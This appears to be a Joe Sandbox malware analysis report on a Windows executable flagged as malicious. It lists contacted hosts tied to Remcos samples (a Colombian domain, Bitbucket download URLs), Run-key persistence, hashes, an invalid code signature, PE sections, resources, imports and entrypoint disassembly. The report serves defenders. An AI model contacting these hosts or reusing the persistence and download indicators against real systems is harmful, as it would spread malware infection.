https://remote-app-switcher.stg-east.frontend.public.atl-paas.net	csc.exe, 00000003.00000002.4658171446.00000000076F8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076DC000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-	csc.exe, 00000003.00000002.4658171446.00000000076FC000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	csc.exe, 00000003.00000002.4658171446.0000000007706000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4658171446.00000000073E1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://bitbucket.org	csc.exe, 00000003.00000002.4658171446.00000000076CA000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
181.131.217.244	navegacionseguracol24vip.org	Colombia		13489	EPMTelecomunicacionesSAESPCO	false
185.166.143.49	bitbucket.org	Germany		16509	AMAZON-02US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573904
Start date and time:	2024-12-12 17:50:37 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	hoTwj68T1D.exe renamed because original name is a hash value
Original Sample Name:	50844588480285cb5d541f6c8d80f70bb68195849f4740ee2160ecc562d38044.exe
Detection:	MAL
Classification:	mal100.evad.winEXE@3/1@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 77% Number of executed functions: 140 Number of non-executed functions: 131
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: hoTwj68T1D.exe

Simulations

Behavior and APIs

Time	Type	Description
11:51:55	API Interceptor	9050241x Sleep call for process: csc.exe modified
17:51:59	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PerfectBlues C:\Users\user\Documents\PerfectBlues\Bin\PerfectBlues.exe
17:52:08	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PerfectBlues C:\Users\user\Documents\PerfectBlues\Bin\PerfectBlues.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
181.131.217.244	IXCbn4ZcdS.exe	Get hash	malicious	Remcos	Browse
	4JwhvqLe8n.exe	Get hash	malicious	Unknown	Browse
	d7gXUPUl38.exe	Get hash	malicious	Remcos	Browse
	fIPSLgT0lO.exe	Get hash	malicious	Unknown	Browse
	3XSXmrEOw7.exe	Get hash	malicious	Remcos	Browse
	ozfqy8Ms6t.exe	Get hash	malicious	Remcos	Browse
	pPLwX9wSrD.exe	Get hash	malicious	Remcos	Browse
	sXpIsdpkzy.exe	Get hash	malicious	Remcos	Browse
	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse
	x4fDy1muYs.exe	Get hash	malicious	Unknown	Browse
185.166.143.49	http://jasonj002.bitbucket.io/	Get hash	malicious	HTMLPhisher	Browse	jasonj002.bitbucket.io/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
navegacionseguracol24vip.org	IXCbn4ZcdS.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	4JwhvqLe8n.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	d7gXUPUl38.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	3XSXmrEOw7.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	ozfqy8Ms6t.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	pPLwX9wSrD.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
bitbucket.org	4JwhvqLe8n.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
	fIPSLgT0lO.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
	3XSXmrEOw7.exe	Get hash	malicious	Remcos	Browse	185.166.143.48
	ozfqy8Ms6t.exe	Get hash	malicious	Remcos	Browse	185.166.143.48
	pPLwX9wSrD.exe	Get hash	malicious	Remcos	Browse	185.166.143.50
	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse	185.166.143.49
	x4fDy1muYs.exe	Get hash	malicious	Unknown	Browse	185.166.143.48
	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse	185.166.143.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
EPMTelecomunicacionesSAESPCO	IXCbn4ZcdS.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	4JwhvqLe8n.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	d7gXUPUl38.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	fIPSLgT0lO.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	3XSXmrEOw7.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	ozfqy8Ms6t.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	pPLwX9wSrD.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	sXpIsdpkzy.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	x4fDy1muYs.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
AMAZON-02US	4JwhvqLe8n.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
	fIPSLgT0lO.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
	3XSXmrEOw7.exe	Get hash	malicious	Remcos	Browse	185.166.143.48
	ozfqy8Ms6t.exe	Get hash	malicious	Remcos	Browse	185.166.143.48
	pPLwX9wSrD.exe	Get hash	malicious	Remcos	Browse	54.231.193.17
	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse	185.166.143.49
	x4fDy1muYs.exe	Get hash	malicious	Unknown	Browse	185.166.143.48
	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse	185.166.143.50

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	4JwhvqLe8n.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
	fIPSLgT0lO.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
	3XSXmrEOw7.exe	Get hash	malicious	Remcos	Browse	185.166.143.49
	ozfqy8Ms6t.exe	Get hash	malicious	Remcos	Browse	185.166.143.49
	pPLwX9wSrD.exe	Get hash	malicious	Remcos	Browse	185.166.143.49
	hCJ8gK9kNn.exe	Get hash	malicious	Remcos	Browse	185.166.143.49
	x4fDy1muYs.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse	185.166.143.49

Process:	C:\Users\user\Desktop\hoTwj68T1D.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	979567343
Entropy (8bit):	0.033204161043693635
Encrypted:	false
SSDEEP:
MD5:	B1BA4D0A3449B701936FAD00460C9DB4
SHA1:	960BEE9AAFF92BE255D2CF91B4E25B7C9234609A
SHA-256:	BF5B29CE881CCB38A220FF42297AC5B6AE79887A47EA7B8DD6872E52598587D4
SHA-512:	192E9544E76B5D7C77574EDC1B0E2B78892CBCA6E471C994936435E62EA61C110505F7393191344B5A28223B9AC0997655B9882BB353E881102267AA205B23AE
Malicious:	true
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@.......................................................,...P...............................@......................................................CODE................................ ..`DATA..... ..........................@...BSS......................................idata... ....... ..................@....tls.........0...........................rdata.......@......................@..P.rsrc...............................@..P.....................................................P......................@..P........................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.353332682330234
TrID:	Win32 Executable (generic) a (10002005/4) 99.25% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Win32 Executable Delphi generic (14689/80) 0.15% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02%
File name:	hoTwj68T1D.exe
File size:	1'958'096 bytes
MD5:	045decc006fc4af07f572acc9211ef53
SHA1:	2a550781d034e9b0c537cea517665b60db681e0a
SHA256:	50844588480285cb5d541f6c8d80f70bb68195849f4740ee2160ecc562d38044
SHA512:	d4f2dbfce045977c413ec44b404e2bdfc66723989626cf198cf129ae3f90c4628694db8cca35dd8ac6afe4dc37248d0db91f034f4d7bc4859e87f2c908f29e8a
SSDEEP:	49152:O8Z1S9O16poKjKcr+zfIv57Vbnbqlo9hs+O/x:JA3jF+zQv51T9wx
TLSH:	C995BF11F343C8FFD1A31A38D91649A8C922BF742D37D94731E2BE4E2DB96901D29B52
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	bfa7a25b02e0abe2

Static PE Info

General

Entrypoint:	0x49d804
Entrypoint Section:	CODE
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	1
OS Version Minor:	0
File Version Major:	1
File Version Minor:	0
Subsystem Version Major:	1
Subsystem Version Minor:	0
Import Hash:	b3cd7c0aa95667d7693c55396582e070

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	24/08/2022 20:00:00 25/08/2023 19:59:59
Subject Chain	CN=FAT\u0130H RAMAZAN \xc7IKAN, O=FAT\u0130H RAMAZAN \xc7IKAN, S=Isparta, C=TR
Version:	3
Thumbprint MD5:	2D8B84CDDBF71F3805C686216C5C9A76
Thumbprint SHA-1:	209E406A32E9828A24B6F61709C1304E48FD8867
Thumbprint SHA-256:	BEFF4B0359766EE42B4A0821D56FA5BE8BF9509F69E6889AB24A10B370DDC1C4
Serial:	00B36FF258D2CE5052EE69C6394CAA64D2

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF4h
push ebx
call 00007FBCF925D3C9h
call 00007FBCF925EE78h
call 00007FBCF92C2C7Bh
call 00007FBCF9269C42h
call 00007FBCF926B00Dh
call 00007FBCF926CF64h
call 00007FBCF927485Bh
call 00007FBCF9281886h
call 00007FBCF928B04Dh
call 00007FBCF928B588h
call 00007FBCF92A0477h
call 00007FBCF92E47B2h
mov ebx, 004A0628h
mov eax, dword ptr [ebx]
call 00007FBCF9280ECEh
mov edx, 0049D934h
mov eax, dword ptr [ebx]
call 00007FBCF9280BDEh
mov ecx, 004A0708h
mov edx, 0048CD10h
mov eax, dword ptr [ebx]
call 00007FBCF9280EC1h
mov ecx, 004A0718h
mov edx, 004987D0h
mov eax, dword ptr [ebx]
call 00007FBCF9280EB0h
mov ecx, 004A06A4h
mov edx, 00449294h
mov eax, dword ptr [ebx]
call 00007FBCF9280E9Fh
mov ecx, 004A06B0h
mov edx, 004562E0h
mov eax, dword ptr [ebx]
call 00007FBCF9280E8Eh
mov ecx, 004A0704h
mov edx, 0048A7B8h
mov eax, dword ptr [ebx]
call 00007FBCF9280E7Dh
mov ecx, 004A06B4h
mov edx, 00464114h
mov eax, dword ptr [ebx]
call 00007FBCF9280E6Ch
mov ecx, 004A06C0h
mov edx, 000000F8h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa1000	0x1fb8	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xaf000	0x13ab98	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x1db400	0x2cd0	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa5000	0x93ac	.rdata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xa4000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x9d000	0x9ca00	de45883494b03a435dc7d28c1e6da5df	False	0.4934407422186752	data	6.6677636497411035	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x9e000	0x2000	0x1800	e7b7e9da4470ec2d71a6a67df9af58ae	False	0.44580078125	data	5.104176574124708	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0xa0000	0x1000	0x1000	64a9f52d8122c7c93a9215c9ad7eb2db	False	0.4228515625	data	5.109356560744763	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa1000	0x2000	0x2000	dd367b786a991e86658ffdeab6c2a9cc	False	0.3790283203125	data	5.013802688698057	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xa3000	0x1000	0x1000	7d79efa565909e9d610fa3c529360030	False	0.18701171875	MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"	2.0794861004307057	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xa4000	0xb000	0x200	912224ec799b5caecf4b0db6cd44bd4f	False	0.05078125	MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0xaf000	0x13ab98	0x13ac00	495af957a30f99843089435901f06805	False	0.6679741796564734	data	7.497824220392454	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xb0734	0x134	data			0.4805194805194805
RT_CURSOR	0xb0868	0x134	data			0.38311688311688313
RT_CURSOR	0xb099c	0x134	data			0.36038961038961037
RT_CURSOR	0xb0ad0	0x134	data			0.4090909090909091
RT_CURSOR	0xb0c04	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"			0.4967532467532468
RT_CURSOR	0xb0d38	0x134	data			0.4642857142857143
RT_BITMAP	0xb0e6c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xb103c	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380			0.46487603305785125
RT_BITMAP	0xb1220	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xb13f0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39870689655172414
RT_BITMAP	0xb15c0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.4245689655172414
RT_BITMAP	0xb1790	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5021551724137931
RT_BITMAP	0xb1960	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5064655172413793
RT_BITMAP	0xb1b30	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xb1d00	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5344827586206896
RT_BITMAP	0xb1ed0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xb20a0	0x590	Device independent bitmap graphic, 176 x 15 x 4, image size 1320	Czech	Czech Republic	0.10112359550561797
RT_BITMAP	0xb2630	0x590	Device independent bitmap graphic, 176 x 15 x 4, image size 1320	Czech	Czech Republic	0.09620786516853932
RT_BITMAP	0xb2bc0	0x590	Device independent bitmap graphic, 176 x 15 x 4, image size 1320	Czech	Czech Republic	0.10252808988764045
RT_BITMAP	0xb3150	0x590	Device independent bitmap graphic, 176 x 15 x 4, image size 1320	Czech	Czech Republic	0.10603932584269662
RT_BITMAP	0xb36e0	0x98	Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colors			0.5197368421052632
RT_BITMAP	0xb3778	0x98	Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colors			0.506578947368421
RT_ICON	0xb3810	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	Czech	Czech Republic	0.28360215053763443
RT_STRING	0xb3af8	0x15e	data			0.5714285714285714
RT_STRING	0xb3c58	0x1f4	data			0.404
RT_STRING	0xb3e4c	0x22c	data			0.44244604316546765
RT_STRING	0xb4078	0xe4	data			0.5131578947368421
RT_STRING	0xb415c	0x8a	data			0.7681159420289855
RT_STRING	0xb41e8	0x164	data			0.6460674157303371
RT_STRING	0xb434c	0xd0	data			0.6730769230769231
RT_STRING	0xb441c	0x132	data			0.6405228758169934
RT_STRING	0xb4550	0x7a	data			0.5901639344262295
RT_STRING	0xb45cc	0x164	data			0.5955056179775281
RT_STRING	0xb4730	0x128	data			0.668918918918919
RT_STRING	0xb4858	0x1d2	data			0.5536480686695279
RT_STRING	0xb4a2c	0x3ac	data			0.33191489361702126
RT_STRING	0xb4dd8	0x190	data			0.5775
RT_STRING	0xb4f68	0x1d6	data			0.44468085106382976
RT_STRING	0xb5140	0x114	data			0.6159420289855072
RT_STRING	0xb5254	0xf6	data			0.6138211382113821
RT_STRING	0xb534c	0xf4	data			0.5901639344262295
RT_STRING	0xb5440	0x46	data			0.7142857142857143
RT_STRING	0xb5488	0x2c0	data			0.44176136363636365
RT_STRING	0xb5748	0x346	data			0.3042959427207637
RT_STRING	0xb5a90	0x43c	data			0.42435424354243545
RT_STRING	0xb5ecc	0x2a6	data			0.5176991150442478
RT_STRING	0xb6174	0x402	data			0.4142300194931774
RT_STRING	0xb6578	0x2c6	data			0.3732394366197183
RT_STRING	0xb6840	0x18c	data			0.5757575757575758
RT_STRING	0xb69cc	0x3a8	data			0.37393162393162394
RT_STRING	0xb6d74	0x348	data			0.3630952380952381
RT_STRING	0xb70bc	0x3ac	data			0.40425531914893614
RT_STRING	0xb7468	0x3e2	data			0.3822937625754527
RT_STRING	0xb784c	0x234	data			0.5124113475177305
RT_STRING	0xb7a80	0x2da	data			0.46301369863013697
RT_STRING	0xb7d5c	0x2fa	data			0.36351706036745407
RT_STRING	0xb8058	0x202	data			0.4961089494163424
RT_STRING	0xb825c	0xc8	data			0.675
RT_STRING	0xb8324	0x1ec	data			0.5060975609756098
RT_STRING	0xb8510	0x27a	data			0.471608832807571
RT_STRING	0xb878c	0x3aa	data			0.42643923240938164
RT_STRING	0xb8b38	0x7e	data			0.6428571428571429
RT_STRING	0xb8bb8	0x36c	data			0.386986301369863
RT_STRING	0xb8f24	0x486	data			0.25302245250431776
RT_STRING	0xb93ac	0x57a	data			0.2817403708987161
RT_STRING	0xb9928	0x388	data			0.3805309734513274
RT_STRING	0xb9cb0	0x3ec	data			0.3934262948207171
RT_STRING	0xba09c	0x2b4	data			0.40895953757225434
RT_STRING	0xba350	0x478	data			0.40559440559440557
RT_STRING	0xba7c8	0x348	data			0.45714285714285713
RT_STRING	0xbab10	0x38c	data			0.4107929515418502
RT_STRING	0xbae9c	0x410	data			0.37596153846153846
RT_STRING	0xbb2ac	0x2e2	data			0.44850948509485095
RT_STRING	0xbb590	0x2f2	data			0.35543766578249336
RT_STRING	0xbb884	0x30c	data			0.3871794871794872
RT_STRING	0xbbb90	0x2ce	data			0.42618384401114207
RT_STRING	0xbbe60	0x68	data			0.75
RT_STRING	0xbbec8	0xb4	data			0.6277777777777778
RT_STRING	0xbbf7c	0xae	data			0.5344827586206896
RT_RCDATA	0xbc02c	0x4c6e	Delphi compiled form 'TFormEdCIL'			0.16538893999795565
RT_RCDATA	0xc0c9c	0x1884	Delphi compiled form 'TFormEdFONT'			0.3303059273422562
RT_RCDATA	0xc2520	0x48db	Delphi compiled form 'TFormEdLINKA'			0.16036673636802315
RT_RCDATA	0xc6dfc	0x4583	Delphi compiled form 'TFormEdZAST'			0.16954200618151166
RT_RCDATA	0xcb380	0x126a	Delphi compiled form 'TFormFM'			0.30229104794229955
RT_RCDATA	0xcc5ec	0x3c6	Delphi compiled form 'TFormHlas'			0.4109730848861284
RT_RCDATA	0xcc9b4	0x38cb	Delphi compiled form 'TFormKONF'			0.217552789050141
RT_RCDATA	0xd0280	0x1e14	Delphi compiled form 'TFormMAIN'			0.2927272727272727
RT_RCDATA	0xd2094	0x2cf	Delphi compiled form 'TFormPANEL'			0.5521557719054242
RT_RCDATA	0xd2364	0x75e	Delphi compiled form 'TFormTISK'			0.39183457051961823
RT_RCDATA	0xd2ac4	0x10f6	Delphi compiled form 'TFormVolby'			0.3433901427913404
RT_RCDATA	0xd3bbc	0x440	Delphi compiled form 'TLoginDialog'			0.4963235294117647
RT_RCDATA	0xd3ffc	0x400	Delphi compiled form 'TPasswordDialog'			0.4794921875
RT_GROUP_CURSOR	0xd43fc	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0xd4410	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0xd4424	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0xd4438	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0xd444c	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0xd4460	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_ICON	0xd4474	0x14	data	Czech	Czech Republic	1.25
RT_DLGINCLUDE	0xd4488	0x93a36	PC bitmap, Windows 3.x format, 75902 x 2 x 41, image size 604946, cbSize 604726, bits offset 54			0.9690554069115599
RT_ANIICON	0x167ec0	0xc408	PC bitmap, Windows 3.x format, 6990 x 2 x 50, image size 50513, cbSize 50184, bits offset 54			0.4471943248844253
RT_ANIICON	0x1742c8	0x9fdd	PC bitmap, Windows 3.x format, 5814 x 2 x 46, image size 40928, cbSize 40925, bits offset 54			0.35738546120952963
RT_ANIICON	0x17e2a8	0xb0c0	PC bitmap, Windows 3.x format, 5975 x 2 x 46, image size 46040, cbSize 45248, bits offset 54			0.3753757072135785
RT_ANIICON	0x189368	0x32c64	PC bitmap, Windows 3.x format, 26406 x 2 x 34, image size 208257, cbSize 207972, bits offset 54			0.49264804877579677
RT_ANIICON	0x1bbfcc	0x2dbc9	PC bitmap, Windows 3.x format, 23626 x 2 x 43, image size 187454, cbSize 187337, bits offset 54			0.4928070802884641

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetModuleFileNameA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll	MessageBoxA
oleaut32.dll	VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll	RegSetValueExA, RegQueryValueExA, RegQueryInfoKeyA, RegOpenKeyExA, RegFlushKey, RegEnumKeyExA, RegDeleteKeyA, RegCreateKeyExA, RegCloseKey
kernel32.dll	lstrcmpA, WriteFile, VirtualAlloc, TerminateThread, SizeofResource, SetFilePointer, SetErrorMode, SearchPathA, ReleaseMutex, ReadFile, OpenFileMappingA, MulDiv, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetSystemDefaultLCID, GetProfileStringA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryA, FreeResource, InterlockedDecrement, InterlockedIncrement, FreeLibrary, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, FatalAppExitA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateMutexA, CreateFileA, CompareStringA, CloseHandle
gdi32.dll	UnrealizeObject, TextOutA, StretchDIBits, StretchBlt, StartPage, StartDocA, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyPolyline, PlayEnhMetaFile, PatBlt, MoveToEx, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetCurrentPositionEx, GetClipBox, GetBitmapBits, ExtTextOutA, ExtCreatePen, ExcludeClipRect, EnumFontsA, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICA, CreateFontIndirectA, CreateDIBitmap, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
